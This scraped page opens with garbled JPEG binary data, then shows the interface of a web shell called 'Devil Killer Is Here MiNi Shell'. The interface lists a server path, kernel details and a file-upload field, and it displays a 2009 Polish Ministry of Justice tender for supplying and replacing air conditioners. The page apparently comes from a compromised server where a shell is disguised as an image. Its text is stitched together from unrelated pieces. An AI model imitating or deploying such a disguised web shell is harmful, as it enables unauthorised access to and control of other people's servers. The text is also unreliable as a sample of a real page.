JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090807/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090807/271524-N-2009.html

<p class="kh_header"><b>Warszawa: Dostawa, montaż, uruchomienie oraz konserwacja 4 szt. klimatyzatorów 
w pomieszczeniach nr 5,6,7,8 w budynku przy ul. Zwycięzców 34 
w Warszawie oraz wymiana urządzeń klimatyzacyjnych, w tym 
7 klimatyzatorów i 2 kompletów klimatyzacji precyzyjnej, pracujących 
z czynnikiem chłodniczym R22 na nowe urządzenia z czynnikiem dopuszczonym Ustawą o substancjach zubożających warstwę ozonową</b><br>
<b>Numer ogłoszenia: 271524 - 2009; data zamieszczenia: 07.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ministerstwo Sprawiedliwości , Al. Ujazdowskie 11, 00-950 Warszawa, woj. mazowieckie, tel. 022 521 27 73,5212888, 5212214, faks 022 6289785.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ms.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa, montaż, uruchomienie oraz konserwacja 4 szt. klimatyzatorów 
w pomieszczeniach nr 5,6,7,8 w budynku przy ul. Zwycięzców 34 
w Warszawie oraz wymiana urządzeń klimatyzacyjnych, w tym 
7 klimatyzatorów i 2 kompletów klimatyzacji precyzyjnej, pracujących 
z czynnikiem chłodniczym R22 na nowe urządzenia z czynnikiem dopuszczonym Ustawą o substancjach zubożających warstwę ozonową.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa, montaż, uruchomienie oraz konserwacja 4 szt.   
     klimatyzatorów w pomieszczeniach nr 5,6,7,8 w budynku przy ul. Zwycięzców 34 
     w Warszawie oraz wymiana urządzeń klimatyzacyjnych, w tym 7 klimatyzatorów 
     i 2 kompletów klimatyzacji precyzyjnej, pracujących z czynnikiem chłodniczym R22 na 
     nowe urządzenia z czynnikiem dopuszczonym ustawą z dnia 20 kwietnia 2004 r. 
     o substancjach zubożających warstwę ozonową (Dz. U. z 31 maja 2004 r. Nr 121 poz. 
     1263 ze zm.). 
2. Zamawiający dopuszcza składanie ofert częściowych na wykonanie jednej lub dwóch 
     części zamówienia.
2.1	Część I zamówienia obejmuje:
1)	dostawę, instalację i uruchomienie 4 sztuk klimatyzatorów ściennych typu SPLIT lub MULTISPLIT, w n/w czterech kolejno przylegających do siebie pomieszczeniach biurowych na parterze budynku przy ul. Zwycięzców 34 
w Warszawie, o podanych nominalnych mocach chłodniczych jednostek wewnętrznych:
- pomieszczenie nr 5 - 61 m3, od 2,5 do 3,0 kW,
- pomieszczenie nr 6 - 49  m3, od 2,5 do 3,0 kW,
- pomieszczenie nr 7 (salka konferencyjna do 10 osób) - 49 m3, od 3,0 do 4,5 kW,
- pomieszczenie nr 8 - 62 m3, od 2,5 do 3,0 kW
         2) przeglądy konserwacyjne klimatyzatorów wymienionych w punkcie 1), 
                 wykonywane co 6 m-cy w okresie  gwarancji, tj. 6 przeglądów,
         
        Wymagania techniczno-instalacyjne:
    -  odprowadzenie skroplin - grawitacyjne na zewnątrz budynku,
    -  długość tras chłodniczych - do 5 metrów,
    -  urządzenia z funkcją grzania,
    -  wykonanie zasilania elektrycznego poszczególnych jednostek,
3)  wymianę 7 sztuk klimatyzatorów (demontaż, transport do utylizacji i utylizacja oraz dostawa, instalacja i uruchomienie) na nowe urządzenia odpowiednie (równoważne) do zainstalowanych.
Wykaz i dane klimatyzatorów do wymiany zawarte są w załączniku nr 1 do umowy.
 
          Wymagania techniczno-instalacyjne:
   -  instalacja nowych klimatyzatorów - w miejscu dotychczasowych urządzeń,
   -  długość tras chłodniczych - średnio 10 metrów.
2.2.   Część II zamówienia obejmuje:
1) wymianę 2 kompletów klimatyzacji precyzyjnej typ Hiflex S08LUA firmy Emmerson Network Power zainstalowanych w budynku Ministerstwa Sprawiedliwości przy ul. Zwycięzców 34 w Warszawie - piwnica, pom. 011, na nowe urządzenia klimatyzacji precyzyjnej.
Wymiana polega na demontażu zainstalowanych urządzeń, ich transporcie do utylizacji i utylizacji oraz dostawie, instalacji i uruchomieniu nowych urządzeń.

                Opis istniejących urządzeń, żądane parametry powietrza, wymagania techniczno-
                 instalacyjne, wytyczne dla branż, warunki odbioru zawarte są w załączniku nr 2 do 
                 umowy.
3.Wykonawca udzieli gwarancji na prawidłowe działanie dostarczonego sprzętu na okres 
     3 lat licząc od daty  bezusterkowego odbioru, na warunkach określonych w Istotnych 
     Warunkach Umowy, stanowiących załącznik nr 1 do SIWZ.
4. Ilekroć w opisie przedmiotu zamówienia zawartym w niniejszej SIWZ użyte są znaki 
     towarowe, patenty lub pochodzenie, a także normy, Zamawiający dopuszcza rozwiązanie  
     równoważne.
5. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w 
     stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Zmiany 
     postanowień umowy mogą dotyczyć przedmiotu umowy tylko w przypadku zaprzestania 
     produkcji przez producenta oferowanego przez Wykonawcę urządzenia (elementu), jeśli 
     Wykonawca pomimo dołożenia należytej staranności nie mógł uzyskać takiej informacji 
     do chwili zawarcia umowy. Wykonawca musi wykazać, iż dołożył należytej staranności, 
     aby uzyskać od producenta informację odnośnie kontynuowania lub zaprzestania produkcji 
     oferowanego przez siebie urządzenia (elementu) i zaoferować w zamian przedmiot umowy 
     o nie niższych parametrach technicznych i funkcjonalności, kompatybilny z urządzeniem 
     (elementem) Zamawiającego w zakresie wskazanym w SIWZ oraz przedstawić na piśmie   
     propozycje zmian w zakresie specyfikacji technicznej i funkcjonalnej w stosunku do 
     specyfikacji technicznej i funkcjonalnej przedmiotu umowy zaoferowanego przez niego 
     w ofercie.
6. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy 
      w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Zmiany 
      postanowień umowy mogą dotyczyć zmiany terminu wykonania przedmiotu umowy 
      określonego w pkt 3 Istotnych Warunków Umowy, wyłącznie z przyczyn leżących po 
      stronie Zamawiającego, potwierdzonych pisemną informacją przekazaną Wykonawcy - 
      wówczas termin wykonania umowy ulegnie odpowiedniemu przesunięciu.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.71.72.00-3, 50.53.20.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda złożenia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> A.	dla części I zamówienia:

1.	Zgodnie z art. 22 ust. 1 ustawy o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie;
          2)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem  
                   technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią  
                   pisemne zobowiązanie innych podmiotów do udostępnienia potencjału  
                   technicznego i osób zdolnych do wykonania zamówienia - tzn.: wykonali  
                   (zrealizowali), także w przypadku wykonywanych (realizowanych) świadczeń 
                   okresowych lub ciągłych, w okresie ostatnich trzech lat przed dniem wszczęcia 
                   przedmiotowego postępowania o udzielenie zamówienia, a jeżeli okres 
                   prowadzenia działalności jest krótszy - w tym okresie co najmniej jedno zlecenie 
                   w zakresie dostawy urządzeń klimatyzacyjnych i usługi ich instalacji o łącznej  
                   wartości dostawy i instalacji w ramach jednego zlecenia (z jednym Odbiorcą) nie 
                   mniejszej niż 70.000 PLN netto (bez VAT)

Wykonawca musi wykazać, że posiada doświadczenie zawodowe w odniesieniu 
       do powyższego zlecenia (dostawy i usługi instalacji), rozumiane jako wykonane 
       (zrealizowane, zakończone) z należytą starannością;

3)   znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  
          zamówienia - Zamawiający nie opisuje, nie wyznacza szczegółowego warunku 
          w tym zakresie;

4)      nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie 
          art. 24 ustawy (odpowiednio).

2. Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
    2.1. Zamawiający oceni, czy Wykonawca spełnia warunki, o których mowa w pkt 1, na  
            podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału 
            w postępowaniu i na podstawie złożonych wraz z ofertą dokumentów żądanych przez 
            zamawiającego potwierdzających spełnianie tych warunków.
    2.2.  Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie:
             wykonawca spełnia albo nie spełnia poszczególne warunki.

B.	dla części II zamówienia:

1.    Zgodnie z art. 22 ust. 1 ustawy o udzielenie zamówienia mogą ubiegać się Wykonawcy,   
        którzy: 
1)   posiadają uprawnienia do wykonywania określonej działalności lub czynności,  
         jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - Zamawiający  
         nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie;
          2)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem  
                   technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią  
                   pisemne zobowiązanie innych podmiotów do udostępnienia potencjału  
                   technicznego i osób zdolnych do wykonania zamówienia - tzn.: wykonali  
                   (zrealizowali), także w przypadku wykonywanych (realizowanych) świadczeń 
                   okresowych lub ciągłych, w okresie ostatnich trzech lat przed dniem wszczęcia 
                   przedmiotowego postępowania o udzielenie zamówienia, a jeżeli okres  
                   prowadzenia działalności jest krótszy - w tym okresie co najmniej jedno zlecenie 
                   w zakresie dostawy klimatyzacji precyzyjnej i usługi jej 
                   instalacji o wartości dostawy i instalacji jednego kompletu klimatyzacji 
                   precyzyjnej nie mniejszej niż 200.000 PLN netto (bez VAT). 

Wykonawca musi wykazać, że posiada doświadczenie zawodowe w odniesieniu       
        do powyższego zlecenia (dostawy i usługi instalacji), rozumiane jako wykonane 
        (zrealizowane, zakończone) z należytą starannością;

3)   znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  
          zamówienia - Zamawiający nie opisuje, nie wyznacza szczegółowego warunku 
          w tym zakresie;

4)      nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie 
          art. 24 ustawy (odpowiednio).

2. Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
    2.1. Zamawiający oceni, czy Wykonawca spełnia warunki, o których mowa w pkt 1, na  
            podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału 
            w postępowaniu i na podstawie złożonych wraz z ofertą dokumentów żądanych przez 
            zamawiającego potwierdzających spełnianie tych warunków.
    2.2.  Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie:
             wykonawca spełnia albo nie spełnia poszczególne warunki..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że Wykonawca nie podlega wykluczeniu na podstawie art. 24 
      ustawy, Zamawiający żąda złożenia wraz z ofertą następujących dokumentów:
1.1.   aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do 
          ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do 
          rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie 
          wcześniej niż 6 miesięcy przed upływem terminu składania ofert - oryginał lub kopia 
          dokumentu poświadczona za zgodność z oryginałem przez osobę/osoby 
          uprawnione do reprezentowania Wykonawcy.
2. W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez  
      Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania osobami zdolnymi  
       do wykonania zamówienia, Zamawiający żąda złożenia wraz z ofertą następujących  
       dokumentów:

A.  dla części I zamówienia:

2.1. podpisanego przez Wykonawcę wykazu wykonanych dostaw i usług, uwzględniającego 
        co najmniej 1 (jedno) zlecenie (dostawę i instalację) spełniające warunek, 
        o którym mowa w pkt 1 ppkt 2 Rozdziału VIII części A SIWZ (formularz stanowi   
        załącznik nr 4A do SIWZ), zawierającego co najmniej:
a)	opis przedmiotu wykonanego (zrealizowanego, zakończonego) zlecenia (dostawy i instalacji), w tym także zrealizowanej (zakończonej) części wykonywanego (realizowanego) zlecenia (dostawy i instalacji), zgodnie 
z wymaganiami Zamawiającego; 
b)	odbiorcę, ze wskazaniem co najmniej nazwy;
c)	datę (dzień, miesiąc, rok) wykonania (zrealizowania, zakończenie) zlecenia (dostawy i instalacji), a w przypadku wykonywanych (realizowanych) świadczeń okresowych lub ciągłych - datę zakończonej części zlecenia (dostawy i instalacji) zgodnego z wymaganiami Zamawiającego;
d)	wartość netto (bez VAT) w złotych wykonanego (zrealizowanego, zakończonego) zlecenia (dostawy i instalacji)
wraz z dokumentem potwierdzającym, że dostawa i instalacja zostały wykonane należycie (np. referencja, protokół odbioru, itp.).

      Dokument potwierdzający, że dostawa i instalacja zostały wykonane należycie, Wykonawca zobowiązany jest złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 

Dokument, o którym mowa w ppkt 2.1., tj. wykaz wykonanych dostaw i usług, Wykonawca zobowiązany jest złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 

Dokumenty sporządzone w języku obcym Wykonawca zobowiązany jest złożyć wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.

W przypadku podania wartości netto (bez VAT) wykonanego zlecenia (dostawy 
i instalacji) w walucie obcej, Zamawiający dokona odpowiednich przeliczeń wg średniego kursu tej waluty, określonego przez NBP z dnia wszczęcia przedmiotowego postępowania, tj. z dnia ukazania się ogłoszenia o zamówieniu w siedzibie oraz na stronie internetowej Zamawiającego. Jeżeli w dniu ukazania się ogłoszenia o zamówieniu NBP nie opublikuje informacji o średnim kursie walut, Zamawiający dokona odpowiednich przeliczeń według średniego kursu z pierwszego kolejnego dnia, w którym NBP opublikuje ww. informacje.

B.  dla części II zamówienia:

2.1. podpisanego przez Wykonawcę wykazu wykonanych dostaw i usług, 
        uwzględniającego co najmniej 1 (jedno) zlecenie (dostawę i instalację) spełniające 
        warunek, o którym mowa w pkt 1 ppkt 2 Rozdziału VIII części B SIWZ (formularz 
        stanowi załącznik nr 4B do SIWZ), zawierającego co najmniej:
a) opis przedmiotu wykonanego (zrealizowanego, zakończonego) zlecenia  
      (dostawy i instalacji), w tym także zrealizowanej (zakończonej) części  
      wykonywanego (realizowanego) zlecenia (dostawy i instalacji), zgodnie 
      z wymaganiami Zamawiającego; 
b)   odbiorcę, ze wskazaniem co najmniej nazwy;
c)  datę (dzień, miesiąc, rok) wykonania (zrealizowania, zakończenie) zlecenia  
       (dostawy i instalacji), a w przypadku wykonywanych (realizowanych)   
       świadczeń okresowych lub ciągłych - datę zakończonej części zlecenia  
       (dostawy i instalacji) zgodnego z wymaganiami Zamawiającego;
d) wartość netto (bez VAT) w złotych wykonanego (zrealizowanego,  
        zakończonego) zlecenia (dostawy i instalacji)
wraz z dokumentem potwierdzającym, że dostawa i instalacja zostały wykonane należycie (np. referencja, protokół odbioru, itp.).

      Dokument potwierdzający, że dostawa i instalacja zostały wykonane należycie, Wykonawca zobowiązany jest złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 

Dokument, o którym mowa w ppkt 2.1., tj. wykaz wykonanych dostaw i usług, Wykonawca zobowiązany jest złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 

Dokumenty sporządzone w języku obcym Wykonawca zobowiązany jest złożyć wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.

W przypadku podania wartości netto (bez VAT) wykonanego zlecenia (dostawy 
i instalacji) w walucie obcej, Zamawiający dokona odpowiednich przeliczeń wg średniego kursu tej waluty, określonego przez NBP z dnia wszczęcia przedmiotowego postępowania, tj. z dnia ukazania się ogłoszenia o zamówieniu w siedzibie oraz na stronie internetowej Zamawiającego. Jeżeli w dniu ukazania się ogłoszenia o zamówieniu NBP nie opublikuje informacji o średnim kursie walut, Zamawiający dokona odpowiednich przeliczeń według średniego kursu z pierwszego kolejnego dnia, w którym NBP opublikuje ww. informacje.

3.  Wykonawca jest zobowiązany złożyć wraz z ofertą oświadczenie o spełnieniu warunków
      udziału w postępowaniu zgodnie z art. 44 ustawy - w załączeniu druk do ewentualnego
      wykorzystania (Załącznik nr 3 do SIWZ). Oryginał oświadczenia podpisany przez
      osobę/osoby uprawnioną/uprawnione do reprezentowania Wykonawcy.

Zamawiający zaleca odpowiednie skreślenie w formularzu oświadczenia w zakresie dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub w zakresie przedstawienia pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
W przypadku złożenia oświadczenia bez skreśleń i nie załączenia do oferty pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, Zamawiający uzna, iż Wykonawca dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia.

4.  W przypadku oferty składanej przez Wykonawców występujących wspólnie o udzielenie
      zamówienia, czyli w szczególności konsorcja, dokumenty wymienione odpowiednio:
      4.1. w pkt 1 ppkt 1.1. niniejszego rozdziału składa każdy z Wykonawców oddzielnie,
      4.2. w pkt 2 niniejszego rozdziału Wykonawcy składają łącznie.
5.   W przypadku, gdy Wykonawca składa oferty częściowe na wykonanie jednej lub dwóch 
       części zamówienia, dopuszczalnym jest złożenie jednego kompletu dokumentów   
       wymienionych w punkcie 1 (a także odpowiednio w punkcie 6) niniejszego rozdziału,  
       celem potwierdzenia spełnienia przez Wykonawcę warunków udziału w postępowaniu.
6. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 
       Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1.1. niniejszego  
       rozdziału, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę 
       lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji  
       ani nie ogłoszono upadłości.
7.  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub  
      miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 6, zastępuje  
      się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym  
      organem sądowym, administracyjnym albo organem samorządu zawodowego lub  
      gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca  
      ma siedzibę lub miejsce zamieszkania.
8.  Dokumenty, o których mowa w pkt 6 i 7, powinny być wystawione nie wcześniej niż 
      6 miesięcy przed upływem terminu składania ofert.
9.  Dokumenty, o których mowa w pkt 6 i 7 niniejszego rozdziału, należy złożyć w formie 
      oryginału lub kopii poświadczonej za zgodność z oryginałem (oryginał nie jest  
      wymagany) przez osobę/osoby uprawnione do reprezentowania Wykonawcy. 
10.  Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język  
       polski, poświadczonym przez osobę/osoby uprawnione do reprezentowania Wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ms.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ministerstwo Sprawiedliwości, Biuro Dyrektora Generalnego, Wydział Zamówień Publicznych (pok. nr 528), Al. Ujazdowskie 11, 00-950 Warszawa.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2009 godzina 12:00, miejsce: Ministerstwo Sprawiedliwości, Al. Ujazdowskie 11, 00-950 Warszawa, Biuro Podawcze.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa, instalacja i uruchomienie 4 sztuk klimatyzatorów ściennych typu SPLIT lub MULTISPLIT, przeglądy konserwacyjne tych klimatyzatorów, wymiana klimatyzatorów (demontaż, transport do utylizacji + dostawa, instalacja i uruchomienie) szt. 7 na nowe urządzenia odpowiednie (równoważne) do zainstalowanych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1	Część I zamówienia obejmuje:
1)	dostawę, instalację i uruchomienie 4 sztuk klimatyzatorów ściennych typu SPLIT lub MULTISPLIT, w n/w czterech kolejno przylegających do siebie pomieszczeniach biurowych na parterze budynku przy ul. Zwycięzców 34 
w Warszawie, o podanych nominalnych mocach chłodniczych jednostek wewnętrznych:
- pomieszczenie nr 5 - 61 m3, od 2,5 do 3,0 kW,
- pomieszczenie nr 6 - 49  m3, od 2,5 do 3,0 kW,
- pomieszczenie nr 7 (salka konferencyjna do 10 osób) - 49 m3, od 3,0 do 4,5 kW,
- pomieszczenie nr 8 - 62 m3, od 2,5 do 3,0 kW
         2) przeglądy konserwacyjne klimatyzatorów wymienionych w punkcie 1), 
                 wykonywane co 6 m-cy w okresie  gwarancji, tj. 6 przeglądów,
         
        Wymagania techniczno-instalacyjne:
    -  odprowadzenie skroplin - grawitacyjne na zewnątrz budynku,
    -  długość tras chłodniczych - do 5 metrów,
    -  urządzenia z funkcją grzania,
    -  wykonanie zasilania elektrycznego poszczególnych jednostek,
3)  wymianę 7 sztuk klimatyzatorów (demontaż, transport do utylizacji i utylizacja oraz dostawa, instalacja i uruchomienie) na nowe urządzenia odpowiednie (równoważne) do zainstalowanych.
Wykaz i dane klimatyzatorów do wymiany zawarte są w załączniku nr 1 do umowy.
 
          Wymagania techniczno-instalacyjne:
   -  instalacja nowych klimatyzatorów - w miejscu dotychczasowych urządzeń,
   -  długość tras chłodniczych - średnio 10 metrów..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.71.72.00-3, 50.53.20.00-3.</li>
